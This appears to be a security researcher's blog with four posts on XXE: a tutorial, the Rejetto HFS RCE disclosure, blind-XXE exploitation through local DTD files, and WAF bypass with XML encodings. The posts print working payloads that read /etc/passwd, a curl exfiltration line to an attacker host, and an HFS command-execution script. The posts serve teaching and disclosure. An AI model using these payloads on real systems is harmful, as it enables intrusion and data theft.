Arseniy Sharoglazov

What is XXE and how does it work?

Arseniy Sharoglazov — Fri, 31 May 2024 12:52:59 +0000

XXE is a vulnerability in the processing of XML, a text format marked up according to specific rules. If an application processes it incorrectly, it can be attacked.

At the beginning of any XML document, you can specify a doctype. This is a text header that declares what kind of document it is and what it contains. Sometimes dangerous constructs, such as external entities, are allowed in the doctype.

XXE stands for XML eXternal Entity.

This article covers the classic approach to the vulnerability. First, we talk about the parts of XML:

Tags. What a document is made of
Document. How to build XML from tags
XML declaration. Declaring the XML
Doctype. Describing the document structure

Then we talk about entities: entities, external entities, parameter entities, character references.

Finally, we learn how to attack:

Reading files. Discovering passwords
Request forgery. Attacking daemons and the local network
How to check. Finding out whether the server is vulnerable
What's next. Problems with the vulnerability

Let's break it down!

Tags

A tag is a building block of the document. If the document is a house, a tag is a brick.

A tag is a label in angle brackets: <abc>. There are three kinds of tags: start: <abc>, end: </abc>, empty: <abc/>.

Information is stored between the start tag and the end tag:

<abc>XXE</abc>

This is called an element. An empty tag is also an element.

Start tags and empty tags can have attributes. The attribute value can be in double or single quotes:

<text lang="en-US">XXE</text><break size='20'/>

Attributes hold small options: language, sequence number. An attribute says: I belong to what is inside the tag.

Comments can appear between tags:

<!-- XXE --><abc lang="en-US" page='1'>XXE <!-- XXE --> XXE </abc>

Comments are for developers. Applications skip them.

Processing instructions

XML allows processing instructions:

<abc/><?inst TEXT?><abc/>

Applications will usually treat these instructions like comments. Do not name an instruction “xml”, since that name is reserved for the XML declaration.

Document

If you pass an application a bare set of tags, it will not understand it. Applications only accept documents.

A document is a single element that can, in turn, contain other elements:

<!-- XXE -->
<page>
    <descr lang="en-US">XXE</descr>
    <xyz/>
</page>

Tags in a document must be properly nested: the most recently opened tag is closed first. The shortest document consists of a single empty tag.
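As a rough illustration of these rules, the sketch below uses Python's standard xml.etree.ElementTree module to check whether a string is accepted as a document. The helper name is_well_formed is an assumption made for this example, and other parsers may report errors differently.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if the parser accepts `text` as a single XML document."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


# The shortest document: one empty tag.
print(is_well_formed("<abc/>"))
# Properly nested tags: the inner element is closed before the outer one.
print(is_well_formed("<page><descr>XXE</descr></page>"))
# Tags closed in the wrong order are rejected.
print(is_well_formed("<page><descr>XXE</page></descr>"))
# A bare set of tags without a single root element is not a document.
print(is_well_formed("<abc/><abc/>"))
```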

XML declaration

The declaration is the first XML header. It states what kind of document this is and which encoding it uses:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

The declaration always comes first: it tells the parser how to read the doctype and the document body.

The declaration has three attributes:

version: XML version. Write 1.0.
encoding: Encoding. Usually UTF-8.
standalone: Standalone status. In a standalone XML document, external entities do not work. Write no.

The attributes cannot be reordered. The encoding and standalone attributes are optional.

The declaration can help distinguish XML injection from XXE.

Works	Does not work
`<?xml version="1.0"?> <page> Text </page>`	`<page> <?xml version="1.0"?> Text </page>`
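The two cases in the table can be reproduced with a short sketch. It assumes Python's standard xml.etree.ElementTree module as the parser; the helper name parses is made up for this example.

```python
import xml.etree.ElementTree as ET

AT_START = '<?xml version="1.0"?> <page> Text </page>'
INSIDE = '<page> <?xml version="1.0"?> Text </page>'


def parses(text: str) -> bool:
    """Return True if the document is accepted by the parser."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


# The declaration is only accepted at the very start of the document.
print("declaration at start:", parses(AT_START))
print("declaration inside element:", parses(INSIDE))
```

If an injected declaration is rejected, you are most likely writing into the middle of an existing document (XML injection) rather than controlling its start.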

I always recommend writing the declaration. First, you make sure that you control the start of the document. Second, the specification recommends that a document begin with the declaration, so a doctype without one is best avoided.

Doctype

The doctype is the second XML header. It is an optional construct that describes the structure of the document.

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ELEMENT page (descr)*>
    <!ELEMENT descr ANY>
    <!ATTLIST descr
        lang CDATA #REQUIRED>
]>
<page>
    <descr lang="en-US">Text</descr>
</page>

The minimal doctype names the root element:

<!DOCTYPE page>

The doctype is needed to describe the structure of the document. This is done in a separate language called DTD.

Don't worry. You don't need to know DTD in depth. It is enough to know how to define entities.

Entities

An entity is a piece of text that can be defined in the DTD and then used in the document through a reference:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY english "en">
    <!ENTITY english_full "&english;-US">
]>
<page>
    <descr lang="&english_full;">Text</descr>
</page>

These are called general entities. They are used when some text or special symbol is repeated several times.

General entities are expanded when the document is read, not in the doctype. They can contain elements, but they cannot change the outer structure. They can also be nested.
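To see the expansion from the application's side, here is a minimal sketch that parses the example with Python's standard xml.etree.ElementTree, which expands internal general entities. The extra `&english;` reference in the element text is added for this illustration only.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY english "en">
    <!ENTITY english_full "&english;-US">
]>
<page>
    <descr lang="&english_full;">Text &english;</descr>
</page>"""

root = ET.fromstring(DOCUMENT)
descr = root.find("descr")

# The application never sees the references, only the expanded text.
print(descr.get("lang"))
print(descr.text)
```

The nested reference inside english_full is resolved only when english_full itself is used in the document.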

By default, you already have five entities:

Entity	What the application sees
&lt;	<
&gt;	>
&quot;	"
&apos;	'
&amp;	&

They are needed so that special characters do not break the structure. They also help protect against XML injection.
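As a small sketch of that protection, the snippet below escapes untrusted text with the standard xml.sax.saxutils helpers before placing it in a document. The sample string is made up for this example.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

untrusted = 'admin <admin@localhost> & "friends"'

# escape() replaces &, < and > with the predefined entities.
element = "<descr>" + escape(untrusted) + "</descr>"
# quoteattr() escapes the value and adds suitable surrounding quotes.
attribute = "<descr lang=" + quoteattr(untrusted) + "/>"

print(element)
print(attribute)

# After parsing, the application gets the original text back unchanged.
print(ET.fromstring(element).text == untrusted)
print(ET.fromstring(attribute).get("lang") == untrusted)
```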

External entities

External entities are entities whose text is fetched from a link:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY info SYSTEM "http://api.wolframalpha.com/v2/result?appid=[TOKEN]&input=the+next+solar+eclipse">
]>
<page>
    <descr lang="en-US">The next solar eclipse occurs on &info;.</descr>
</page>

In this example, the parser follows the link, inserts the data, and then hands the text to the application.

The parser does not always look at external entities. If it supports lazy evaluation, it only accesses the link when it needs the text of the element. Elements that the application skips will not be read by such a parser.

There are two ways to connect entities: through SYSTEM and through PUBLIC.

<!ENTITY name SYSTEM "URI">
<!ENTITY name PUBLIC "Public-ID" "URI">

If the entity is connected through PUBLIC, the parser first looks for it in its storage by Public-ID and, if it is not found there, fetches it from the link.

Advanced note: Using the storage and Public-ID was once a secret way of exploiting XXE, similar to my 2018 publication, Exploiting XXE with local DTD files. I am not sure whether this method was published later.

A URI can be not only a resource on the Internet but also a path to a file in the operating system.

External entities are prohibited in attributes:

<a attr="&ent;">&ent;</a>

Inside SYSTEM and PUBLIC identifiers, special characters in the URI such as & and % are not processed; you can insert them as they are.

Parameter entities

Parameter entities are special entities for use inside the DTD:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY % languages '<!ENTITY english "en-US">'>
    %languages;
]>
<page>
    <descr lang="&english;">Text</descr>
</page>

They differ from ordinary entities by the percent sign. They are unrelated to ordinary entities; even their namespaces are different.

Parameter entities can also be external:

…
<!DOCTYPE page [
    <!ENTITY % languages SYSTEM 'languages.dtd'>
    %languages;
]>
…

Unlike general entities, parameter entities can often alter the structure of the DTD.

External doctype

Another way to include a DTD is through an external doctype. It can be used with either SYSTEM or PUBLIC.

<?xml version="1.0"?>
<!DOCTYPE page SYSTEM 'languages.dtd'>
<page>XXE</page>

The external doctype can be combined with an internal DTD:

<?xml version="1.0"?>
<!DOCTYPE page SYSTEM 'languages.dtd' [
    <!ENTITY english "en">
]>
<page>XXE</page>

Character references

Character references are almost entities. They are used to specify characters by their Unicode code:

Character	DEC format	HEX format
%	&#37;	&#x25;
&	&#38;	&#x26;
§	&#167;	&#xA7;
‰	&#8240;	&#x2030;

Character references are recognized both in entities in the doctype and in the body of the document:

Before reading

<!DOCTYPE abc [
    <!ENTITY permille_1 "&#8240;">
    <!ENTITY permille_2 "&#38;#8240;">
    <!ENTITY permille_3 "&#38;#38;#8240;">
]>
<abc>
    A: &#8240;
    B: &permille_1;
    C: &permille_2;
    D: &permille_3;
</abc>

After reading

<abc>
    A: ‰
    B: ‰
    C: ‰
    D: &#8240;
</abc>

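In the first line, the reference is expanded in the element. In the second line, the reference is expanded in the doctype. In the third, it is expanded first in the doctype and then again in the element. In the fourth, both expansions happen as well, but what remains is plain text that only looks like a reference.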
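The sketch below builds the DEC and HEX forms for a character and then parses the document above with Python's standard xml.etree.ElementTree to observe how many times each reference is expanded. The helper name char_refs is an assumption made for this example.

```python
import xml.etree.ElementTree as ET


def char_refs(ch: str) -> tuple[str, str]:
    """Return the decimal and hexadecimal character references for `ch`."""
    code = ord(ch)
    return f"&#{code};", f"&#x{code:X};"


for ch in "%&§‰":
    print(ch, *char_refs(ch))

DOCUMENT = """<!DOCTYPE abc [
    <!ENTITY permille_1 "&#8240;">
    <!ENTITY permille_2 "&#38;#8240;">
    <!ENTITY permille_3 "&#38;#38;#8240;">
]>
<abc>
    A: &#8240;
    B: &permille_1;
    C: &permille_2;
    D: &permille_3;
</abc>"""

# Collect the text of the root element line by line, as the application sees it.
lines = [line.strip() for line in ET.fromstring(DOCUMENT).text.strip().splitlines()]
print(lines)
```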

Reading files

You already know how to build documents, write doctypes, and define entities. Now for the most important part: how to attack.

Arbitrary File Read is an attack in which you can read files on the server. When you put the path to a local file in the URI of an external entity, the parser includes the file in the document and the application may display its contents:

<?xml version="1.0"?>
<!DOCTYPE page [
    <!ENTITY file SYSTEM "/var/www/monitoring/.htpasswd">
]>
<page>
    &file;
</page>

Finding file paths is hard. You have to guess them, but there are tricks:

Sometimes directory listing works

<!ENTITY file SYSTEM "/home">

Sometimes directory traversal works

<!ENTITY file SYSTEM "/etc/abc/../../etc/passwd">

Files can be read through relative paths

<!ENTITY file1 SYSTEM "./test.txt">
<!ENTITY file2 SYSTEM "file:./test.txt">

A relative path is resolved from the application's working directory if the external entity is declared in the internal DTD, and relative to the DTD's URI if it is declared in an external DTD.
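The external-DTD case can be modeled with generic URI resolution. This sketch uses urllib.parse.urljoin from the Python standard library; the DTD address is a hypothetical example, and real parsers may resolve paths differently, so treat it as an approximation only.

```python
from urllib.parse import urljoin

# Hypothetical address of an external DTD that declares the entities.
external_dtd = "http://attacker.example/dtd/languages.dtd"

# A plain relative path is resolved against the URI of the external DTD.
print(urljoin(external_dtd, "./test.txt"))

# A reference with its own scheme is not merged with the http:// base.
print(urljoin(external_dtd, "file:./test.txt"))
```

The second result keeps the file: scheme, so in this model it is no longer tied to the location of the external DTD.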

If you only control the external DTD, in some cases you can use the file: protocol to reach paths relative to the application directory. This is especially relevant for Java.

Request forgery

SSRF is an attack in which you send requests from the application to various services, internal or external, including those whose access is blocked by a firewall.

The best-known example of SSRF exploitation through XXE to date is probably the combination of CVE-2024-21887 and CVE-2024-22024 in Ivanti Connect Secure:

<?xml version="1.0"?>
<!DOCTYPE root [
    <!ENTITY % xxe SYSTEM "http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8attacker.com%3b">
    %xxe;
]>
<root></root>

Although this is not the original method of exploiting the vulnerabilities, it is a clear example of how to chain XXE and SSRF in recent software.

How to check for XXE

For testing, it is best to find a ready-made document that the application accepts. It can be intercepted or exported.

Next, it is important to send it to the server in the form the server expects. For example, the server may check the Content-Type header and only allow the values text/xml or application/xml.

Finally, reference an external entity in the document in every possible way and try to perform an SSRF to the attacker's host.

Method 1

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message [
    <!ENTITY % test SYSTEM "http://testxxe.attacker.com/">
%test;
]>
<message …>
    …
</message>

Method 2

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message SYSTEM "http://testxxe.attacker.com/">
<message …>
    …
</message>

Method 3

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE message [
    <!ENTITY test SYSTEM "http://testxxe.attacker.com/">
]>
<message document="1.0">
    <some_structures>
        …
    </some_structures>
     <some_structures>
        <column name="test">&test;</column>
    </some_structures>
</message>

If the application is vulnerable, your DNS server should receive the corresponding request, or you should notice a pause in the response.

When checking through DNS, there is a higher chance of getting a response.

You can always use a PUBLIC construct instead of SYSTEM. One of them may work while the other does not.
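For an authorized test, the three methods and their PUBLIC variants can be generated with a small helper. This is only a sketch: build_probes, the Public-ID "probe", and the minimal document body are assumptions made for this example, and in practice the body should be a document the application really accepts.

```python
def build_probes(host: str, root: str = "message") -> dict[str, str]:
    """Build the three probe documents, each in a SYSTEM and a PUBLIC variant."""
    url = f"http://{host}/"
    declaration = '<?xml version="1.0" encoding="utf-8" standalone="no"?>'
    probes = {}
    for keyword in ("SYSTEM", "PUBLIC"):
        # "probe" is a placeholder Public-ID chosen for this sketch.
        if keyword == "SYSTEM":
            external_id = f'SYSTEM "{url}"'
        else:
            external_id = f'PUBLIC "probe" "{url}"'
        # Method 1: external parameter entity referenced inside the DTD.
        probes[f"method1-{keyword}"] = "\n".join([
            declaration,
            f"<!DOCTYPE {root} [",
            f"    <!ENTITY % test {external_id}>",
            "    %test;",
            "]>",
            f"<{root}/>",
        ])
        # Method 2: external doctype.
        probes[f"method2-{keyword}"] = "\n".join([
            declaration,
            f"<!DOCTYPE {root} {external_id}>",
            f"<{root}/>",
        ])
        # Method 3: external general entity referenced in the document body.
        probes[f"method3-{keyword}"] = "\n".join([
            declaration,
            f"<!DOCTYPE {root} [",
            f"    <!ENTITY test {external_id}>",
            "]>",
            f"<{root}>&test;</{root}>",
        ])
    return probes


for name, document in build_probes("testxxe.attacker.com").items():
    print(f"--- {name} ---")
    print(document)
```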

If all three methods fail, you cannot say for certain that there is no vulnerability. Pay attention to indirect signs: support for the XML declaration, working safe DTD constructs, errors on the page, and the response time of the request.

If you believe that outbound requests are blocked by the firewall and DNS is unavailable, you can also run OS-specific boolean tests:

Linux (valid DTD)

<!ENTITY % test SYSTEM "file:///sys/devices/system/cpu/uevent">
%test;

Linux (invalid DTD)

<!ENTITY % test SYSTEM "file:///bin/sh">
%test;

Windows 7+ (valid DTD)

<!ENTITY % test SYSTEM "file:///C:\Windows\System32\wbem\en-US\p2p-mesh.mfl">
%test;

Windows 7+ (invalid DTD)

<!ENTITY % test SYSTEM "file:///C:\Windows\notepad.exe">
%test;

Sometimes it is not worth spending the time: for example, the SOAP protocol is almost never vulnerable. But if you notice custom XML in one of the fields inside SOAP, take the time to examine it, since there could be XXE there too.

What's next?

XXE has several problems.

Binary files cannot be read
If the parser encounters bytes that are not valid in the encoding, processing stops. The default encoding is UTF-8, but it can be changed in the XML header.

Files that break the structure cannot be displayed
Some files you try to read will contain XML special characters:

[users]
name = admin
username = admin <admin@localhost>
password = 6x&IBGK

Including these characters will break the document and stop processing.

Applications rarely return data on the page
You may get a response over DNS, but the page will be empty. Here, the classic attacks will not be effective.

These problems make XXE a very complex vulnerability. Solving them is called XXE exploitation.
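The first two problems can be reproduced locally without any target. The sketch below is a simulation under stated assumptions: the sample bytes are made up, and the effect of entity inclusion is imitated by splicing the file contents into an element and parsing the result with Python's standard xml.etree.ElementTree.

```python
import xml.etree.ElementTree as ET

# Problem 1: bytes that are not valid in the document encoding (UTF-8 here).
binary = b"\x89PNG\r\n\x1a\n"
try:
    binary.decode("utf-8")
    decodable = True
except UnicodeDecodeError:
    decodable = False
print("decodable as UTF-8:", decodable)

# Problem 2: file contents that include XML special characters.
file_contents = "username = admin <admin@localhost>\npassword = 6x&IBGK\n"
# Imitate the included entity text by placing the file inside an element.
document = "<page>" + file_contents + "</page>"
try:
    ET.fromstring(document)
    well_formed = True
except ET.ParseError:
    well_formed = False
print("document still well-formed:", well_formed)
```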

I recommend the following sources for understanding what can be done with XXE in difficult cases:

Add to this list in the comments on this article's X page, and don't get disappointed with XXE!

Rejetto HTTP File Server 2.3m Unauthenticated RCE

Arseniy Sharoglazov — Fri, 24 May 2024 22:51:56 +0000

I just decided to share an interesting Unauthenticated RCE and the story behind it!

Rejetto HTTP File Server

During a red team assessment, I stumbled upon a mysterious web app:

Here’s what I encountered on the 80/tcp port

This web application was confirmed to be Rejetto HFS, a once-popular Windows web server first released in August 2002.

A quick online search revealed that version 2.3m has no known vulnerabilities. However, I was surprised to find that older versions had numerous RCEs!

import socket

url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"

This code for exploiting RCE in HTTP File Server 2.1.2 was found on ExploitDB

What is “{.exec”? Is this one of the earliest known template injections? The software appeared too old for such attacks, and the platform, Windows, is also unconventional.

Confused, I decided to download and analyze what was going on. I obtained an exe file from the official website and found the source code on GitHub, which turned out to be written in Delphi.

Unauthenticated Remote Code Execution

When I saw the code in both GitHub and IDA Pro, I was amazed. Indeed, HFS has its own template parser, making it one of the oldest of its kind.

Furthermore, it took me less than 10 minutes to bypass all restrictions and execute my code on version 2.3m, which was marked as the latest and stable!

I decided to publish the screenshot in a redacted version

It was a bit challenging, but in the end, I created a POC that not only executes the code, but also returns the output and hides itself from log files (via a null byte). Note that the value of the Host header was also tampered with, which is crucial for the injection.

Reporting

I was sad to learn that Rejetto HTTP File Server 2.x is now obsolete and no longer supported. After a discussion with Massimo Melina, we concluded that we should recommend that all users update to HFS 3.

Timeline

18/08/2023 — Reported to the vendor
21/08/2023 — Reply received
24/05/2024 — Vendor informed about disclosure
24/05/2024 — Reply received
25/05/2024 — Article released
25/05/2024 — CVE Request 1671764
31/05/2024 — MITRE assigned CVE-2024-23692
06/06/2024 — Stephen Fewer published the Metasploit module and the AttackerKB article

Exploiting XXE with local DTD files

Arseniy Sharoglazov — Thu, 13 Dec 2018 18:00:00 +0000

This little technique can force your blind XXE to output anything you want!

Why do we have trouble exploiting XXE in 2k18?

Imagine you have an XXE. External entities are supported, but the server’s response is always empty. In this case you have two options: error-based and out-of-band exploitation.

Let’s consider this error-based example:

Request

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>

Response

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin
(No such file or directory)

Contents of ext.dtd

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

See? You are using an external server for delivering the DTD payload. What can you do if there is a firewall between you and the target server? Nothing!

What if we put the external DTD content directly into the DOCTYPE? If we do this, an error will always appear:

Request

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
    %eval;
    %error;
]>
<message></message>

Response

Internal Error: SAX Parser Error. Detail: The parameter entity reference “%file;” cannot occur within markup in the internal subset of the DTD.

External DTDs allow us to include one entity inside another one, but it’s prohibited in the internal DTD syntax.

What can we do inside an internal DTD?

To use external DTD syntax in the internal DTD subset, you can bruteforce a local DTD file on the target host and redefine some parameter-entity references inside it:

Request

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">

    <!ENTITY % condition 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

Response

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin

(No such file or directory)

Contents of sip-app_1_0.dtd

…
<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of">
<!ELEMENT pattern (%condition;)>
…

This works because all XML entities are constant. If you define two entities with the same name, only the first one will be used.
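The "first declaration wins" rule can be observed with a tiny sketch. It uses general entities and Python's standard xml.etree.ElementTree purely for convenience; the entity name greeting is made up for this example, and the attack above relies on the same rule for parameter entities.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<!DOCTYPE message [
    <!ENTITY greeting "first definition">
    <!ENTITY greeting "second definition">
]>
<message>&greeting;</message>"""

# The second declaration of the same name is ignored by the parser.
expanded = ET.fromstring(DOCUMENT).text
print(expanded)
```

This is why the redefinition of condition has to appear in the internal subset before %local_dtd; is referenced.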

How can we find a local DTD file?

Nothing is easier than enumerating files and directories. Below are a few more examples of the successful application of this trick:

Custom Linux System

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

Custom Windows System

<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

I would like to thank Mikhail Klyuchnikov from Positive Technologies for sharing the path to this always-present Windows DTD file.

Cisco WebEx

<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Citrix XenMobile Server

<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Any Web Application on IBM WebSphere Application Server

<!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd">
<!ENTITY % xs-datatypes 'Your DTD code'>
<!ENTITY % simpleType "a">
<!ENTITY % restriction "b">
<!ENTITY % boolean "(c)">
<!ENTITY % URIref "CDATA">
<!ENTITY % XPathExpr "CDATA">
<!ENTITY % QName "NMTOKEN">
<!ENTITY % NCName "NMTOKEN">
<!ENTITY % nonNegativeInteger "NMTOKEN">
%local_dtd;

Timeline

01/01/2016 — Discovering the technique
12/12/2018 — Writing the article :D
13/12/2018 — Full disclosure

Evil XML with Two Encodings

Arseniy Sharoglazov — Sun, 04 Feb 2018 06:00:00 +0000

WAFs see white noise instead of the document!

In this article, I explain how XML parsers decode XML from different encodings and how to bypass WAFs by using some of the XML decoding features.

What encodings are supported in XML

According to the specification, all XML parsers must be capable of reading documents in at least two encodings: UTF-8 and UTF-16. Many parsers support more encodings, but these should always work.

Extensible Markup Language (XML) 1.0 (Fifth Edition)

Both UTF-8 and UTF-16 are used for writing characters from the Unicode table.

The difference between UTF-8 and UTF-16 is in the way they encode the Unicode characters to a binary code.

UTF-8

In UTF-8, a character is encoded as a sequence of one to four bytes.

The binary code of an encoded character is defined by this template:

Number of bytes	Significant bits	Binary code
1	7	0xxxxxxx
2	11	110xxxxx 10xxxxxx
3	16	1110xxxx 10xxxxxx 10xxxxxx
4	21	11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

Overlong encodings are prohibited, so only the shortest form is valid.
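The template can be turned into a few lines of code. The sketch below is a hand-written encoder for illustration only (utf8_encode is a name made up here, and it does not reject surrogate code points); its output can be compared with Python's built-in codec.

```python
def utf8_encode(code_point: int) -> bytes:
    """Encode one code point following the template, shortest form first."""
    if code_point < 0x80:          # 7 bits:  0xxxxxxx
        return bytes([code_point])
    if code_point < 0x800:         # 11 bits: 110xxxxx 10xxxxxx
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:       # 16 bits: 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    # 21 bits: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
    return bytes([0xF0 | (code_point >> 18),
                  0x80 | ((code_point >> 12) & 0x3F),
                  0x80 | ((code_point >> 6) & 0x3F),
                  0x80 | (code_point & 0x3F)])


for cp in (0x3F, 0xA7, 0x2030, 0x1D6E5):
    print(f"U+{cp:04X}", utf8_encode(cp).hex(" "), utf8_encode(cp) == chr(cp).encode("utf-8"))

# An overlong two-byte form of U+003F is rejected by a conforming decoder.
try:
    b"\xC0\xBF".decode("utf-8")
    overlong_accepted = True
except UnicodeDecodeError:
    overlong_accepted = False
print("overlong form accepted:", overlong_accepted)
```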

UTF-16

In UTF-16, a character is encoded as a sequence of two or four bytes.

The binary code is defined by the following template:

Number of bytes	Significant bits	Binary code
2	16	xxxxxxxx xxxxxxxx
4 *	20	110110xx xxxxxxxx 110111xx xxxxxxxx

* 0x00010000 is subtracted from a character code before encoding it

If a character is encoded with four bytes, its binary code is called a surrogate pair. A surrogate pair is a combination of two 16-bit values from the reserved range U+D800 to U+DFFF. One half of a surrogate pair on its own is not valid.

UTF-16: BE and LE encodings

There are two types of UTF-16: UTF-16BE and UTF-16LE (big-endian / little-endian). They have a different order of bytes.

Big-endian is the “natural” order of bytes, as in Arabic numerals. Little-endian is the inverse order of bytes. It is used in x86-64 and is more common in computers.

Some examples of encoding symbols in UTF-16BE and UTF-16LE:

Encoding	Symbol	Binary code
UTF-16BE	U+003F	00000000 00111111
UTF-16LE	U+003F	00111111 00000000
UTF-16BE *	U+1D6E5	11011000 00110101 11011110 11100101
UTF-16LE *	U+1D6E5	00110101 11011000 11100101 11011110

* In a surrogate pair, each of the two “characters” is byte-swapped on its own. This is designed for backward compatibility with Unicode 1.0, where all symbols were encoded using two bytes only.
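The UTF-16 template and the byte order rules can be checked with a short sketch. The function names utf16_units and utf16_encode are assumptions made for this example; the results are compared against the table above and against Python's built-in codecs.

```python
def utf16_units(code_point: int) -> list[int]:
    """Split a code point into one or two 16-bit units."""
    if code_point < 0x10000:
        return [code_point]
    value = code_point - 0x10000                              # 20 significant bits
    return [0xD800 | (value >> 10), 0xDC00 | (value & 0x3FF)]  # surrogate pair


def utf16_encode(code_point: int, byteorder: str) -> bytes:
    """Serialize each 16-bit unit on its own; byteorder is 'big' or 'little'."""
    return b"".join(unit.to_bytes(2, byteorder) for unit in utf16_units(code_point))


for cp in (0x3F, 0x1D6E5):
    print(f"U+{cp:04X}",
          "BE:", utf16_encode(cp, "big").hex(" "),
          "LE:", utf16_encode(cp, "little").hex(" "))
```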

How do parsers detect encoding

According to the XML specification, parsers detect encoding in four ways:

By external information about encoding

Some network protocols have a special field that indicates the encoding:

Specifying the encoding of the document in the WebDav protocol

Most often, these are protocols built on the MIME standard, for example SMTP, HTTP, and WebDav.

By reading Byte Order Mark (BOM)

The Byte Order Mark (BOM) is a special character with the U+FEFF code.

If a parser finds a BOM at the beginning of the document, then the encoding is determined by the binary code of the BOM.

Encoding	BOM	Example
UTF-8	EF BB BF	EF BB BF 3C 3F 78 6D 6C	...<?xml
UTF-16BE	FE FF	FE FF 00 3C 00 3F 00 78 00 6D 00 6C	...<.?.x.m.l
UTF-16LE	FF FE	FF FE 3C 00 3F 00 78 00 6D 00 6C 00	..<.?.x.m.l.

By first symbols of document

The specification allows parsers to determine encoding by the first bytes:

Encoding	Document
UTF-8 ISO 646 ASCII	3C 3F 78 6D	<?xm
UTF-16BE	00 3C 00 3F	.<.?
UTF-16LE	3C 00 3F 00	<.?.

However, this only works for documents that start with an XML declaration.
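The BOM and first-bytes checks from the two tables above can be sketched as a small function. This is a simplified illustration: detect_encoding is a name made up here, it only covers the rows listed in this article, and real parsers recognize more cases.

```python
from typing import Optional

BOMS = (
    (b"\xEF\xBB\xBF", "UTF-8"),
    (b"\xFE\xFF", "UTF-16BE"),
    (b"\xFF\xFE", "UTF-16LE"),
)

FIRST_BYTES = (
    (b"\x3C\x3F\x78\x6D", "ASCII-compatible (UTF-8, ISO 646, ASCII)"),
    (b"\x00\x3C\x00\x3F", "UTF-16BE"),
    (b"\x3C\x00\x3F\x00", "UTF-16LE"),
)


def detect_encoding(data: bytes) -> Optional[str]:
    """Guess the encoding from a BOM, then from the bytes of '<?xm'."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    for prefix, name in FIRST_BYTES:
        if data.startswith(prefix):
            return name
    return None  # fall back to external information or the default


print(detect_encoding('<?xml version="1.0"?><a/>'.encode("utf-16-be")))
print(detect_encoding(b"\xFF\xFE" + "<a/>".encode("utf-16-le")))
print(detect_encoding(b"<a/>"))
```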

By XML declaration

The encoding can be written in the XML declaration:

<?xml version="1.0" encoding="UTF-8"?>

An XML declaration is a special string that can be written at the beginning of the document. From this string, the parser learns which version of the standard the document follows.

<?xml version="1.0" encoding="ISO-8859-1" ?>
<très>là</très>

Document in the ISO-8859-1 encoding

Obviously, in order to read the declaration, parsers have to know the encoding in which the declaration was written. Still, the XML declaration is useful for distinguishing between ASCII-compatible encodings.

Known Technique: WAF bypass by using UTF-16

The most common way to bypass a WAF by using XML encodings is to encode the XML in an encoding that is not compatible with ASCII, and hope that the WAF will fail to understand it.

For example, this technique worked in the PHDays WAF Bypass contest in 2016.

